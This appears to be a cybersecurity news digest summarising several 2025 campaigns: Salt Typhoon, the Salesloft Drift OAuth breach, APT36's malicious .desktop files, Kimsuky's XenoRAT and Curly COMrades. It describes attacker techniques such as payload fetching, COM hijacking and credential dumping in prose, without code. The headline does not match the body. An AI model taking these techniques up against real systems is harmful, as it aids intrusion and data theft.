ShinyHunters and Scattered Spider Collaborate on Recent Attacks

Chinese state-sponsored Advanced Persistent Threat (APT) actors, specifically the group known as Salt Typhoon, have been conducting a sustained campaign to gain long-term access to critical infrastructure networks worldwide. This campaign targets telecommunications, transportation, lodging, and military networks, exploiting vulnerabilities in routers and taking steps to evade detection and maintain persistent access. The Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners, released a joint advisory detailing this ongoing malicious activity. The advisory provides actionable guidance and intelligence to help organizations defend against these sophisticated cyber threats. The advisory builds on previous reporting and incorporates updated threat intelligence from investigations conducted through August 2025, reflecting overlapping indicators with industry reporting on various Chinese state-sponsored threat groups. Salt Typhoon has been active since at least 2019, targeting at least 600 organizations, including 200 in the U.S., and 80 countries. The Czech Republic's National Cyber and Information Security Agency (NUKIB) issued a warning about data transfers to China, highlighting concerns over the transfer of system and user data to the PRC and the remote administration of technical assets. The Czech government previously accused China of targeting its critical infrastructure through APT 31, which began in 2022. China's offensive cyber activities include large-scale telco attacks by Salt Typhoon and positioning for potential destructive cyberattacks. The advisory tracks this cluster of activity to multiple advanced persistent threats (APTs), though it partially overlaps with Salt Typhoon. The advisory details how state-backed threat actors, including Salt Typhoon, penetrate networks around the world, as well as how defenders can protect their own environments. The Czech Republic's National Cyber and Information Security Agency (NUKIB) has assessed the risk of significant disruptions caused by China at a 'High' level, indicating a high probability of occurrence. NUKIB confirmed malicious activities of Chinese cyber-actors targeting the Czech Republic, including a recent APT31 campaign targeting the Czech Ministry of Foreign Affairs. The Chinese government has access to data stored by private cloud service providers within the Czech Republic, ensuring that sensitive data is always within its reach. NUKIB warns about consumer devices, such as smartphones, IP cameras, electric cars, large language models, and even medical devices and photovoltaic converters manufactured by Chinese firms, as risky devices that can transfer potentially sensitive data to Chinese infrastructure. 45 previously unreported domains associated with Salt Typhoon and UNC4841 have been discovered, with the oldest domain registration activity dating back to May 2020.

A threat actor, UNC6395, exploited OAuth tokens associated with the Drift AI chat agent to breach Salesloft and access customer data across multiple integrations, including Salesforce, Google Workspace, and others. The breach occurred between August 8 and 18, 2025, affecting over 700 organizations, including Zscaler, Palo Alto Networks, Cloudflare, Google Workspace, PagerDuty, Proofpoint, SpyCloud, and Tanium. The attackers targeted Salesforce instances and accessed email from a small number of Google Workspace accounts, exporting large volumes of data, including credentials and access tokens. Salesloft and Salesforce have taken steps to mitigate the breach and are advising affected customers to revoke API keys and rotate credentials. Salesloft will temporarily take Drift offline to enhance security. UNC6395 demonstrated operational security awareness by deleting query jobs, indicating a sophisticated approach. The breach highlights the risks of third-party integrations and the potential for supply chain attacks. The breach is unrelated to previous vishing attacks attributed to ShinyHunters. UNC6395 systematically exported large volumes of data from numerous corporate Salesforce instances, searching for secrets that could be used to compromise victim environments. The campaign is not limited to Salesforce customers who integrate their own solutions with the Salesforce service; it impacts all integrations using Salesloft Drift. There is no evidence that the breaches directly impacted Google Cloud customers. Organizations are urged to review all third-party integrations connected to their Drift instance, revoke and rotate credentials for those applications, and investigate all connected systems for signs of unauthorized access. The blast radius of the Salesloft Drift attacks remains uncertain, with the ultimate scope and severity still unclear. Numerous companies have disclosed downstream breaches resulting from this campaign, including Zscaler, Palo Alto Networks, Proofpoint, Cloudflare, and Tenable. Zscaler and Palo Alto Networks warned of potential social engineering attacks resulting from the campaign. Cloudflare confirmed that some customer support interactions may reveal information about a customer's configuration and could contain sensitive information like access tokens. Okta successfully prevented a breach of its Salesforce instance by enforcing inbound IP restrictions, securing tokens with DPoP, and using the IPSIE framework. Okta recommends that organizations demand IPSIE integration from application vendors and implement an identity security fabric unified across applications. Palo Alto Networks' Unit 42 recommends conducting an immediate log review for signs of compromise and rotating exposed credentials. The breach started with the compromise of Salesloft's GitHub account between March and June 2025. UNC6395 accessed the Salesloft GitHub account and downloaded content from multiple repositories, added a guest user, and established workflows. Reconnaissance activities occurred between March 2025 and June 2025 in the Salesloft and Drift application environments. Salesloft isolated the Drift infrastructure, application, and code, and took the application offline on September 5, 2025. Salesloft rotated credentials in the Salesloft environment and hardened the environment with improved segmentation controls between Salesloft and Drift applications. Salesforce restored the integration with the Salesloft platform on September 7, 2025, but Drift remains disabled. 22 companies have confirmed they were impacted by the supply chain breach. ShinyHunters and Scattered Spider were also involved in the Salesloft Drift attacks.

APT36, a Pakistani cyber espionage group, is actively exploiting Linux .desktop files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. These files execute a payload that establishes persistent access and exfiltrates data. The attack leverages the 'Exec=' field in .desktop files to run shell commands, fetching and executing a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, capable of maintaining stealth and setting up persistence through cron jobs and systemd services. Communication with the command and control (C2) server is conducted over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.

A state-sponsored espionage campaign has targeted foreign embassies in South Korea since March 2025, deploying XenoRAT malware from malicious GitHub repositories. The campaign has launched at least 19 spearphishing attacks against high-value targets, including Central and Western European embassies. The attacks have been attributed to North Korean actor Kimsuky (APT43) with medium confidence, but there are indications of possible Chinese involvement. The malware, XenoRAT, is a powerful trojan capable of logging keystrokes, capturing screenshots, accessing webcams and microphones, performing file transfers, and facilitating remote shell operations. The campaign used highly contextual and multilingual email lures, often timed to match real events, and delivered password-protected archives containing malicious .LNK files. The campaign used cloud storage solutions like Dropbox and Daum Cloud to deliver the XenoRAT payload. The campaign's activity patterns, including timezone analysis and holiday pauses, suggest possible Chinese involvement. The attackers used a decoy document to mask the malicious activity. The campaign's activity was largely originating from a timezone consistent with China. The attackers practiced 'rapid' infrastructure rotation to avoid detection. The campaign used cloud infrastructure to help malicious activities fly under the radar. The attackers used Korean services and infrastructure to blend into the South Korean network.

Curly COMrades, a newly identified APT group, has been targeting government and judicial bodies in Georgia and an energy distribution company in Moldova since at least November 2023. The group employs a methodical approach to gain long-term access to target networks, using legitimate tools and custom malware to extract sensitive data and maintain persistence. The attackers focus on extracting NTDS databases and LSASS memory to obtain user credentials. They use the MucorAgent backdoor to hijack COM objects in the Native Image Generator (Ngen) component of the .NET Framework, enabling persistent access and command execution under the SYSTEM account. The group's tactics include using compromised websites as C2 relays and leveraging tools like CurlCat, RuRat, Mimikatz, and PowerShell scripts for data exfiltration and reconnaissance.